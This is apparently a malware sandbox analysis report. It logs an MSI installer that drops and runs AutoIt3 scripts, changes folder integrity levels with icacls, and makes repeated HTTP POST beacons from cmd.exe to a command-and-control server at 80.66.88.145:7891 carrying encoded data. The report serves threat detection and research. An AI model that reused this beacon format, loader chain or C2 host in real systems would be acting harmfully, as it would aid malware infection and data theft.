                                                        Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49702 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:01:15.589994907 CEST | kBytes transferred: 9 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 145
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnQIFHwC&act=1000
                                                        Timestamp: Jul 26, 2023 14:01:15.624844074 CEST | kBytes transferred: 9 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:01:15 GMT


                                                        Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49703 | Destination IP: 80.66.88.145 | Destination Port: 7891 | Process: C:\Windows\SysWOW64\cmd.exe
                                                        Timestamp: Jul 26, 2023 14:01:15.720359087 CEST | kBytes transferred: 10 | Direction: OUT | Data:
                                                        POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 524
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
                                                        Timestamp: Jul 26, 2023 14:01:15.758169889 CEST | kBytes transferred: 10 | Direction: IN | Data:
                                                        HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:01:15 GMT


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
6          | 192.168.2.4 | 49707       | 80.66.88.145   | 7891             | C:\Windows\SysWOW64\cmd.exe

Timestamp: Jul 26, 2023 14:01:19.834906101 CEST | kBytes transferred: 12 | Direction: OUT | Data: POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 65
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=nERZa7vrnQIFHwC&act=1000
Timestamp: Jul 26, 2023 14:01:19.870748997 CEST | kBytes transferred: 13 | Direction: IN | Data: HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:01:19 GMT


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
7          | 192.168.2.4 | 49708       | 80.66.88.145   | 7891             | C:\Windows\SysWOW64\cmd.exe

Timestamp: Jul 26, 2023 14:01:19.944116116 CEST | kBytes transferred: 14 | Direction: OUT | Data: POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 524
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnQIFHwrZco3JcEYjcEOrcnrLDv%2BwDwEwnExwanhlnERZa%2BMJce&act=1001
Timestamp: Jul 26, 2023 14:01:19.982505083 CEST | kBytes transferred: 14 | Direction: IN | Data: HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:01:19 GMT


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
8          | 192.168.2.4 | 49715       | 80.66.88.145   | 7891             | C:\Windows\SysWOW64\cmd.exe

Timestamp: Jul 26, 2023 14:02:00.962183952 CEST | kBytes transferred: 49 | Direction: OUT | Data: POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 144
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 61 37 76 72 6e 4b 6e 62 6e 7a 26 61 63 74 3d 31 30 30 30
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZa7vrnKnbnz&act=1000
Timestamp: Jul 26, 2023 14:02:01.004143000 CEST | kBytes transferred: 49 | Direction: IN | Data: HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 4
                                                        Date: Wed, 26 Jul 2023 12:02:00 GMT


Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
9          | 192.168.2.4 | 49717       | 80.66.88.145   | 7891             | C:\Windows\SysWOW64\cmd.exe

Timestamp: Jul 26, 2023 14:02:01.069787025 CEST | kBytes transferred: 50 | Direction: OUT | Data: POST / HTTP/1.0
                                                        Host: 80.66.88.145:7891
                                                        Keep-Alive: 300
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/4.0 (compatible; Synapse)
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 520
                                                        Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 4f 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 44 37 6c 63 45 37 34 63 45 4f 72 63 6f 4f 6c 61 48 78 6c 63 45 53 6c 63 45 4f 43 6c 45 4f 6c 61 44 79 6c 63 45 66 50 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 4b 6e 62 6e 66 68 58 61 44 35 6c 63 25 32 42 4d 6c 63 45 33 34 6e 51 30 77 42 62 6e 62 5a 62 6e 5a 61 37 76 72 6e 45 52 5a 63 66 68 68 62 45 35 58 26 61 63 74 3d 31 30 30 31
                                                        Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=coO8cwhrXoOlaH3lcEfPcEOraoOla%2BYlcfhCaDM8cD0ZaoOlcE74cEOrlDOlaD7lcE74cEOrcoOlaHxlcESlcEOClEOlaDylcEfPcEOrcoOlaD7lcE36cEOhcDOlnERZ8SnCjShq6B5dXbD4jYtz4Y54TKouCYOraDOlTKOdcBvCc7RO8fbdX7OCTKobHv08nEAecEOrboOlaDYlcE74cEOrlDOla%2BYlcEfRcEOraDOla%2BxlcESlcEOCcDOlaDylcE78cEOrboOlaDYlcESlcEOCaEOlaD5lcE78cEOhcEOlaHYlcE3XcEOhboOlcDOlcExXcEOraEOlaDylcE7lcEOhaEOlaDklcE74cERZbEyJcYR9XnrxBSnNDwE8TEylTQR4D%3DOdvE3CTKG6BSrNTEyhcoYCnKnbnfhXaD5lc%2BMlcE34nQ0wBbnbZbnZa7vrnERZcfhhbE5X&act=1001
Timestamp: Jul 26, 2023 14:02:01.108280897 CEST | kBytes transferred: 50 | Direction: IN | Data: HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Content-Length: 2
                                                        Date: Wed, 26 Jul 2023 12:02:01 GMT


                                                        Target ID:0
                                                        Start time:14:00:54
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\System32\msiexec.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\15e7232gfN.msi"
                                                        Imagebase:0x7ff71c140000
                                                        File size:66'048 bytes
                                                        MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:1
                                                        Start time:14:00:54
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\System32\msiexec.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                        Imagebase:0x7ff71c140000
                                                        File size:66'048 bytes
                                                        MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:3
                                                        Start time:14:00:56
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F
                                                        Imagebase:0x1220000
                                                        File size:59'904 bytes
                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:4
                                                        Start time:14:00:57
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\icacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                        Imagebase:0x7ff7c72c0000
                                                        File size:29'696 bytes
                                                        MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:5
                                                        Start time:14:00:57
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7c72c0000
                                                        File size:625'664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:6
                                                        Start time:14:00:58
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\expand.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                        Imagebase:0x1100000
                                                        File size:52'736 bytes
                                                        MD5 hash:8F8C20238C1194A428021AC62257436D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:7
                                                        Start time:14:00:58
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7c72c0000
                                                        File size:625'664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:8
                                                        Start time:14:00:59
                                                        Start date:26/07/2023
                                                        Path:C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3
                                                        Imagebase:0x980000
                                                        File size:893'608 bytes
                                                        MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi

                                                        Target ID:9
                                                        Start time:14:01:03
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe
                                                        Imagebase:0xd90000
                                                        File size:232'960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:10
                                                        Start time:14:01:05
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\icacls.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                                                        Imagebase:0x940000
                                                        File size:29'696 bytes
                                                        MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:11
                                                        Start time:14:01:05
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7c72c0000
                                                        File size:625'664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Target ID:12
                                                        Start time:14:01:12
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                        Imagebase:0xe20000
                                                        File size:124'632 bytes
                                                        MD5 hash:CFD37109A4E595C2957C5E0ACC198E8A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:13
                                                        Start time:14:01:14
                                                        Start date:26/07/2023
                                                        Path:C:\ProgramData\fkeabad\Autoit3.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\ProgramData\fkeabad\Autoit3.exe" C:\ProgramData\fkeabad\efghhgd.au3
                                                        Imagebase:0xe90000
                                                        File size:893'608 bytes
                                                        MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:Borland Delphi
                                                        Antivirus matches:
                                                        • Detection: 3%, ReversingLabs

                                                        Target ID:14
                                                        Start time:14:01:17
                                                        Start date:26/07/2023
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd.exe
                                                        Imagebase:0xd90000
                                                        File size:232'960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:15
                                                        Start time:14:01:26
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:16
                                                        Start time:14:01:26
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:17
                                                        Start time:14:01:26
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:18
                                                        Start time:14:01:27
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:19
                                                        Start time:14:01:27
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:20
                                                        Start time:14:01:28
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:21
                                                        Start time:14:01:28
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:22
                                                        Start time:14:01:28
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:23
                                                        Start time:14:01:28
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe
                                                        Imagebase:0x980000
                                                        File size:138'800 bytes
                                                        MD5 hash:408995FA63F7BA3E059C8E32356B86C4
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language

                                                        Target ID:24
                                                        Start time:14:01:45
                                                        Start date:26/07/2023
                                                        Path:C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Program Files (x86)\autoit3\SciTE\SciTE.exe
                                                        Imagebase:0x400000
